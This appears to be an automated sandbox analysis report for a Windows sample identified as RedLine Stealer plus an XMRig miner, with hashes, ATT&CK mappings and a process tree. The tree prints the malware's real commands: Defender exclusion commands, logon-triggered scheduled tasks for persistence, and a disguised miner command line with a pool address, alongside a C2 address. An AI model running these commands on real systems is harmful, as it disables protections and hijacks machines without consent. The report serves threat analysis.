Analysis

  • max time kernel
    150s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    14-10-2021 06:14

General

  • Target

    f4d816b13feaab16dce9b192b5ca8e6b.exe

  • Size

    366KB

  • MD5

    f4d816b13feaab16dce9b192b5ca8e6b

  • SHA1

    4a7f534721da2efb283db7ff3272fd6e2b1252ed

  • SHA256

    979489468d527202ce55a465799013a16fccfcc838d523707a016e064a0e85a1

  • SHA512

    cb53bcda4930f8c8c7202a48ff53d35e9b07b9531ff1e0338b9ac91890a5ce4bcc561cd65f88448a3204094ea02697595257d36da2b1b36a5121e2aa32142757

Malware Config

Extracted

Family

redline

C2

141.94.188.139:43059

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 12 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f4d816b13feaab16dce9b192b5ca8e6b.exe
    "C:\Users\Admin\AppData\Local\Temp\f4d816b13feaab16dce9b192b5ca8e6b.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Users\Admin\AppData\Local\Temp\fl.exe
      "C:\Users\Admin\AppData\Local\Temp\fl.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1724
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1676
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start C:\Users\Admin\AppData\Local\Temp\sadid.exe
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1456
        • C:\Users\Admin\AppData\Local\Temp\sadid.exe
          C:\Users\Admin\AppData\Local\Temp\sadid.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1828
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sadid.exe"
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1548
            • C:\Windows\System32\cmd.exe
              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "wlc32" /tr "C:\Windows\system32\wlc32.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1456
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "wlc32" /tr "C:\Windows\system32\wlc32.exe"
                7⤵
                • Creates scheduled task(s)
                PID:1196
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c "C:\Windows\system32\wlc32.exe"
              6⤵
              • Loads dropped DLL
              PID:1044
              • C:\Windows\system32\wlc32.exe
                C:\Windows\system32\wlc32.exe
                7⤵
                • Executes dropped EXE
                PID:1304
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "C:\Windows\system32\wlc32.exe"
                  8⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1736
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start C:\Users\Admin\AppData\Local\Temp\sddo.exe
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Users\Admin\AppData\Local\Temp\sddo.exe
          C:\Users\Admin\AppData\Local\Temp\sddo.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1092
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sddo.exe"
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1372
            • C:\Windows\System32\cmd.exe
              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
              6⤵
                PID:1628
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                  7⤵
                  • Creates scheduled task(s)
                  PID:1928
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c "C:\Windows\system32\services32.exe"
                6⤵
                • Loads dropped DLL
                PID:1656
                • C:\Windows\system32\services32.exe
                  C:\Windows\system32\services32.exe
                  7⤵
                  • Executes dropped EXE
                  PID:1744
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
                    8⤵
                    • Loads dropped DLL
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1164
                    • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                      "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                      9⤵
                      • Executes dropped EXE
                      PID:1688
                      • C:\Windows\System32\conhost.exe
                        "C:\Windows\System32\conhost.exe" "/sihost32"
                        10⤵
                          PID:956
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c start C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
            3⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1196
            • C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
              C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1788
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe"
                5⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:552
                • C:\Windows\System32\cmd.exe
                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services1312" /tr "C:\Windows\system32\services1312.exe"
                  6⤵
                    PID:1472
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "services1312" /tr "C:\Windows\system32\services1312.exe"
                      7⤵
                      • Creates scheduled task(s)
                      PID:1980
                  • C:\Windows\System32\cmd.exe
                    "cmd" cmd /c "C:\Windows\system32\services1312.exe"
                    6⤵
                    • Loads dropped DLL
                    PID:1696
                    • C:\Windows\system32\services1312.exe
                      C:\Windows\system32\services1312.exe
                      7⤵
                      • Executes dropped EXE
                      PID:1828
                      • C:\Windows\System32\conhost.exe
                        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services1312.exe"
                        8⤵
                        • Loads dropped DLL
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:304
                        • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                          "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                          9⤵
                          • Executes dropped EXE
                          PID:1524
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "/sihost64"
                            10⤵
                              PID:1304
                          • C:\Windows\System32\nslookup.exe
                            C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:5555 --user=46HVc4tSEL6FobVWa4QhpyNV9UCPYgZgvLrvPKz86MLScxHCYrvQY5p1UusoDZmYyJJTQsbBkTzTySGQaZjP8hXfKTpB74q --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
                            9⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1676

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Credential Access

          Credentials in Files

          2
          T1081

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          1
          T1082

          Collection

          Data from Local System

          2
          T1005

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\fl.exe
            MD5

            2e33d374239a9ad923d0a94f257e0240

            SHA1

            5e87887d5deab57e8028777f992f9249d38d2c3b

            SHA256

            006d458be51a03adb2b1e38643d54b38591614ce6c53f9dd2761f1a3092b610f

            SHA512

            393f53ee823b2e2d9da362290f29dd50f9e126eddf63cbeb0b835a5b83f3579af70f0925354755e155beabf9e4d8105038056df01057ebcb79b07f63086714f5

          • C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
            MD5

            2a0a09ec05dfec48e9f06e0314f2e7ec

            SHA1

            2e05169669dbe64ebaef975f3f14b780b96f961c

            SHA256

            c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

            SHA512

            dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

          • C:\Users\Admin\AppData\Local\Temp\sadid-monero.exe
            MD5

            2a0a09ec05dfec48e9f06e0314f2e7ec

            SHA1

            2e05169669dbe64ebaef975f3f14b780b96f961c

            SHA256

            c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

            SHA512

            dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

          • C:\Users\Admin\AppData\Local\Temp\sadid.exe
            MD5

            95570a09e9a2795b137f9fb626d59097

            SHA1

            4e7b266b358dde9d1a21bd95b14ff759905e2887

            SHA256

            5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

            SHA512

            061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

          • C:\Users\Admin\AppData\Local\Temp\sadid.exe
            MD5

            95570a09e9a2795b137f9fb626d59097

            SHA1

            4e7b266b358dde9d1a21bd95b14ff759905e2887

            SHA256

            5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

            SHA512

            061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

          • C:\Users\Admin\AppData\Local\Temp\sddo.exe
            MD5

            9bf4b7e923984e4968d312c1ea85281a

            SHA1

            d3a652480266a0b22e5459803cd53fc046e42942

            SHA256

            8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

            SHA512

            bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

          • C:\Users\Admin\AppData\Local\Temp\sddo.exe
            MD5

            9bf4b7e923984e4968d312c1ea85281a

            SHA1

            d3a652480266a0b22e5459803cd53fc046e42942

            SHA256

            8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

            SHA512

            bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            ecffefa1004efb294e986506fc468eb5

            SHA1

            5af804084d97553cee3f5c5d0b709c71d5ec3e1e

            SHA256

            0bec14fb8aaa5963f80d260aa50f2b47a444fcd6a6d240500c89be61d763fc34

            SHA512

            490520950fe0e5bf3ccd9e187582abf2d191b750d85426d184a8dcf843db2ef0fa31b53e8bcccd38df8f3c6757e5ea7035f149ed51c4fbeafee805cb332eb5f7

          • C:\Windows\System32\Microsoft\Libs\sihost64.exe
            MD5

            680565e1fc9e8c0e09b85e362655d97f

            SHA1

            c8db6748fb07fb3880fe52596630641d83698701

            SHA256

            e40073b36df7cdb093a4a8c3064c53274866d2263796c4d7ff06264f12ca7792

            SHA512

            ba026fd5a867acd060acba90aad64421afa10d22a9f9cc11da503f00e764a8b36574a356c2091d5b50ae97556e372ce4188eac38b5d326e034b857d9342544d3

          • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
            MD5

            44eb06c133f1b7a8e443fb37a20018c1

            SHA1

            42852375e7584dc80415bb8fae35e5ab53babbc4

            SHA256

            418f8860dea790944b99a6fdf7f280649a3df022fd9bb8bc02e725f5c904ae04

            SHA512

            912b1ff24c66c0b2e79ff38b0d0d03dd2339c30171aa66d64976c8b4234eedae64057d247a9bf4a6b2bf42858aba0996a8c09ad73096ed86bac68609c136869c

          • C:\Windows\System32\services1312.exe
            MD5

            2a0a09ec05dfec48e9f06e0314f2e7ec

            SHA1

            2e05169669dbe64ebaef975f3f14b780b96f961c

            SHA256

            c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

            SHA512

            dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

          • C:\Windows\System32\services32.exe
            MD5

            9bf4b7e923984e4968d312c1ea85281a

            SHA1

            d3a652480266a0b22e5459803cd53fc046e42942

            SHA256

            8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

            SHA512

            bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

          • C:\Windows\System32\wlc32.exe
            MD5

            95570a09e9a2795b137f9fb626d59097

            SHA1

            4e7b266b358dde9d1a21bd95b14ff759905e2887

            SHA256

            5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

            SHA512

            061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

          • C:\Windows\system32\services1312.exe
            MD5

            2a0a09ec05dfec48e9f06e0314f2e7ec

            SHA1

            2e05169669dbe64ebaef975f3f14b780b96f961c

            SHA256

            c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

            SHA512

            dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

          • C:\Windows\system32\services32.exe
            MD5

            9bf4b7e923984e4968d312c1ea85281a

            SHA1

            d3a652480266a0b22e5459803cd53fc046e42942

            SHA256

            8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

            SHA512

            bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

          • C:\Windows\system32\wlc32.exe
            MD5

            95570a09e9a2795b137f9fb626d59097

            SHA1

            4e7b266b358dde9d1a21bd95b14ff759905e2887

            SHA256

            5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

            SHA512

            061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

          • \Users\Admin\AppData\Local\Temp\fl.exe
            MD5

            2e33d374239a9ad923d0a94f257e0240

            SHA1

            5e87887d5deab57e8028777f992f9249d38d2c3b

            SHA256

            006d458be51a03adb2b1e38643d54b38591614ce6c53f9dd2761f1a3092b610f

            SHA512

            393f53ee823b2e2d9da362290f29dd50f9e126eddf63cbeb0b835a5b83f3579af70f0925354755e155beabf9e4d8105038056df01057ebcb79b07f63086714f5

          • \Users\Admin\AppData\Local\Temp\sadid-monero.exe
            MD5

            2a0a09ec05dfec48e9f06e0314f2e7ec

            SHA1

            2e05169669dbe64ebaef975f3f14b780b96f961c

            SHA256

            c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

            SHA512

            dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

          • \Users\Admin\AppData\Local\Temp\sadid-monero.exe
            MD5

            2a0a09ec05dfec48e9f06e0314f2e7ec

            SHA1

            2e05169669dbe64ebaef975f3f14b780b96f961c

            SHA256

            c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

            SHA512

            dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

          • \Users\Admin\AppData\Local\Temp\sadid.exe
            MD5

            95570a09e9a2795b137f9fb626d59097

            SHA1

            4e7b266b358dde9d1a21bd95b14ff759905e2887

            SHA256

            5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

            SHA512

            061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

          • \Users\Admin\AppData\Local\Temp\sadid.exe
            MD5

            95570a09e9a2795b137f9fb626d59097

            SHA1

            4e7b266b358dde9d1a21bd95b14ff759905e2887

            SHA256

            5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

            SHA512

            061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

          • \Users\Admin\AppData\Local\Temp\sddo.exe
            MD5

            9bf4b7e923984e4968d312c1ea85281a

            SHA1

            d3a652480266a0b22e5459803cd53fc046e42942

            SHA256

            8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

            SHA512

            bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

          • \Users\Admin\AppData\Local\Temp\sddo.exe
            MD5

            9bf4b7e923984e4968d312c1ea85281a

            SHA1

            d3a652480266a0b22e5459803cd53fc046e42942

            SHA256

            8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

            SHA512

            bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

          • \Windows\System32\Microsoft\Libs\sihost64.exe
            MD5

            680565e1fc9e8c0e09b85e362655d97f

            SHA1

            c8db6748fb07fb3880fe52596630641d83698701

            SHA256

            e40073b36df7cdb093a4a8c3064c53274866d2263796c4d7ff06264f12ca7792

            SHA512

            ba026fd5a867acd060acba90aad64421afa10d22a9f9cc11da503f00e764a8b36574a356c2091d5b50ae97556e372ce4188eac38b5d326e034b857d9342544d3

          • \Windows\System32\Microsoft\Libs\sihost64.exe
            MD5

            680565e1fc9e8c0e09b85e362655d97f

            SHA1

            c8db6748fb07fb3880fe52596630641d83698701

            SHA256

            e40073b36df7cdb093a4a8c3064c53274866d2263796c4d7ff06264f12ca7792

            SHA512

            ba026fd5a867acd060acba90aad64421afa10d22a9f9cc11da503f00e764a8b36574a356c2091d5b50ae97556e372ce4188eac38b5d326e034b857d9342544d3

          • \Windows\System32\Microsoft\Telemetry\sihost32.exe
            MD5

            44eb06c133f1b7a8e443fb37a20018c1

            SHA1

            42852375e7584dc80415bb8fae35e5ab53babbc4

            SHA256

            418f8860dea790944b99a6fdf7f280649a3df022fd9bb8bc02e725f5c904ae04

            SHA512

            912b1ff24c66c0b2e79ff38b0d0d03dd2339c30171aa66d64976c8b4234eedae64057d247a9bf4a6b2bf42858aba0996a8c09ad73096ed86bac68609c136869c

          • \Windows\System32\Microsoft\Telemetry\sihost32.exe
            MD5

            44eb06c133f1b7a8e443fb37a20018c1

            SHA1

            42852375e7584dc80415bb8fae35e5ab53babbc4

            SHA256

            418f8860dea790944b99a6fdf7f280649a3df022fd9bb8bc02e725f5c904ae04

            SHA512

            912b1ff24c66c0b2e79ff38b0d0d03dd2339c30171aa66d64976c8b4234eedae64057d247a9bf4a6b2bf42858aba0996a8c09ad73096ed86bac68609c136869c

          • \Windows\System32\services1312.exe
            MD5

            2a0a09ec05dfec48e9f06e0314f2e7ec

            SHA1

            2e05169669dbe64ebaef975f3f14b780b96f961c

            SHA256

            c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

            SHA512

            dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

          • \Windows\System32\services1312.exe
            MD5

            2a0a09ec05dfec48e9f06e0314f2e7ec

            SHA1

            2e05169669dbe64ebaef975f3f14b780b96f961c

            SHA256

            c82f12d3f5704fd82c5dae1cdaca10c6d3b333ed65d390fb6cecd6e574c6b827

            SHA512

            dd9fee55a39193fccdf9b88eba41893f4f20922e28ca509d5866851bb0bf00e145c0308711271b8b18a08ff8714b301315301bebf75ecd873770a3f377152285

          • \Windows\System32\services32.exe
            MD5

            9bf4b7e923984e4968d312c1ea85281a

            SHA1

            d3a652480266a0b22e5459803cd53fc046e42942

            SHA256

            8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

            SHA512

            bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

          • \Windows\System32\services32.exe
            MD5

            9bf4b7e923984e4968d312c1ea85281a

            SHA1

            d3a652480266a0b22e5459803cd53fc046e42942

            SHA256

            8f38233017cd36a801246190a87be158a563e7c19b11cc6afae25c95edc17636

            SHA512

            bd8e5b81f3bf86d44ba50dbc9da0174c0b552eea45e21e5cdb2312670245692bd11f35d00e406968f0e65b2e8e46710de91cc1c17ead7cef1c5801d5ec810aad

          • \Windows\System32\wlc32.exe
            MD5

            95570a09e9a2795b137f9fb626d59097

            SHA1

            4e7b266b358dde9d1a21bd95b14ff759905e2887

            SHA256

            5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

            SHA512

            061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

          • \Windows\System32\wlc32.exe
            MD5

            95570a09e9a2795b137f9fb626d59097

            SHA1

            4e7b266b358dde9d1a21bd95b14ff759905e2887

            SHA256

            5a823a48f828d7acbc968d038609d81a0d6eca4ec7ea408a65efd5d45ed16c3d

            SHA512

            061173fb26e04921b3c3590fb282a618c36e50f835a48e8ee89645827e8e69ab8751b031dc821d11dcf2cae3ab9c98d9ba34de16f13a38a98a6cf7f862d6c1f2

          • memory/304-165-0x000000001B134000-0x000000001B136000-memory.dmp
            Filesize

            8KB

          • memory/304-167-0x000000001B137000-0x000000001B138000-memory.dmp
            Filesize

            4KB

          • memory/304-166-0x000000001B136000-0x000000001B137000-memory.dmp
            Filesize

            4KB

          • memory/304-163-0x000000001B132000-0x000000001B134000-memory.dmp
            Filesize

            8KB

          • memory/552-100-0x0000000002182000-0x0000000002184000-memory.dmp
            Filesize

            8KB

          • memory/552-91-0x000000001B160000-0x000000001B37C000-memory.dmp
            Filesize

            2.1MB

          • memory/552-116-0x0000000002187000-0x0000000002188000-memory.dmp
            Filesize

            4KB

          • memory/552-98-0x0000000000250000-0x0000000000470000-memory.dmp
            Filesize

            2.1MB

          • memory/552-107-0x0000000002186000-0x0000000002187000-memory.dmp
            Filesize

            4KB

          • memory/552-103-0x0000000002184000-0x0000000002186000-memory.dmp
            Filesize

            8KB

          • memory/956-181-0x000000001AB84000-0x000000001AB86000-memory.dmp
            Filesize

            8KB

          • memory/956-178-0x0000000001A30000-0x0000000001A33000-memory.dmp
            Filesize

            12KB

          • memory/956-177-0x0000000000060000-0x0000000000066000-memory.dmp
            Filesize

            24KB

          • memory/956-183-0x000000001AB87000-0x000000001AB88000-memory.dmp
            Filesize

            4KB

          • memory/956-179-0x000000001AB82000-0x000000001AB84000-memory.dmp
            Filesize

            8KB

          • memory/956-182-0x000000001AB86000-0x000000001AB87000-memory.dmp
            Filesize

            4KB

          • memory/1044-118-0x0000000000000000-mapping.dmp
          • memory/1080-54-0x0000000075FC1000-0x0000000075FC3000-memory.dmp
            Filesize

            8KB

          • memory/1080-56-0x0000000004D90000-0x0000000004D91000-memory.dmp
            Filesize

            4KB

          • memory/1080-55-0x00000000006F0000-0x000000000070B000-memory.dmp
            Filesize

            108KB

          • memory/1080-53-0x0000000001110000-0x0000000001111000-memory.dmp
            Filesize

            4KB

          • memory/1092-73-0x0000000000000000-mapping.dmp
          • memory/1164-146-0x000000001B1A7000-0x000000001B1A8000-memory.dmp
            Filesize

            4KB

          • memory/1164-143-0x000000001B1A2000-0x000000001B1A4000-memory.dmp
            Filesize

            8KB

          • memory/1164-145-0x000000001B1A6000-0x000000001B1A7000-memory.dmp
            Filesize

            4KB

          • memory/1164-144-0x000000001B1A4000-0x000000001B1A6000-memory.dmp
            Filesize

            8KB

          • memory/1196-63-0x0000000000000000-mapping.dmp
          • memory/1196-111-0x0000000000000000-mapping.dmp
          • memory/1304-184-0x00000000000A0000-0x00000000000A6000-memory.dmp
            Filesize

            24KB

          • memory/1304-128-0x0000000000000000-mapping.dmp
          • memory/1372-114-0x000000001B0E7000-0x000000001B0E8000-memory.dmp
            Filesize

            4KB

          • memory/1372-101-0x000000001B0E2000-0x000000001B0E4000-memory.dmp
            Filesize

            8KB

          • memory/1372-97-0x0000000000250000-0x0000000000441000-memory.dmp
            Filesize

            1.9MB

          • memory/1372-104-0x000000001B0E4000-0x000000001B0E6000-memory.dmp
            Filesize

            8KB

          • memory/1372-106-0x000000001B0E6000-0x000000001B0E7000-memory.dmp
            Filesize

            4KB

          • memory/1372-90-0x000000001B350000-0x000000001B53D000-memory.dmp
            Filesize

            1.9MB

          • memory/1456-109-0x0000000000000000-mapping.dmp
          • memory/1456-61-0x0000000000000000-mapping.dmp
          • memory/1472-110-0x0000000000000000-mapping.dmp
          • memory/1488-60-0x0000000000000000-mapping.dmp
          • memory/1512-62-0x0000000000000000-mapping.dmp
          • memory/1524-155-0x0000000000000000-mapping.dmp
          • memory/1548-102-0x000000001B174000-0x000000001B176000-memory.dmp
            Filesize

            8KB

          • memory/1548-92-0x000000001B3E0000-0x000000001B5CD000-memory.dmp
            Filesize

            1.9MB

          • memory/1548-99-0x000000001B172000-0x000000001B174000-memory.dmp
            Filesize

            8KB

          • memory/1548-96-0x0000000000170000-0x0000000000361000-memory.dmp
            Filesize

            1.9MB

          • memory/1548-105-0x000000001B176000-0x000000001B177000-memory.dmp
            Filesize

            4KB

          • memory/1548-115-0x000000001B177000-0x000000001B178000-memory.dmp
            Filesize

            4KB

          • memory/1624-58-0x0000000000000000-mapping.dmp
          • memory/1628-108-0x0000000000000000-mapping.dmp
          • memory/1656-117-0x0000000000000000-mapping.dmp
          • memory/1676-87-0x0000000002310000-0x0000000002F5A000-memory.dmp
            Filesize

            12.3MB

          • memory/1676-173-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-164-0x0000000140000000-0x0000000140786000-memory.dmp
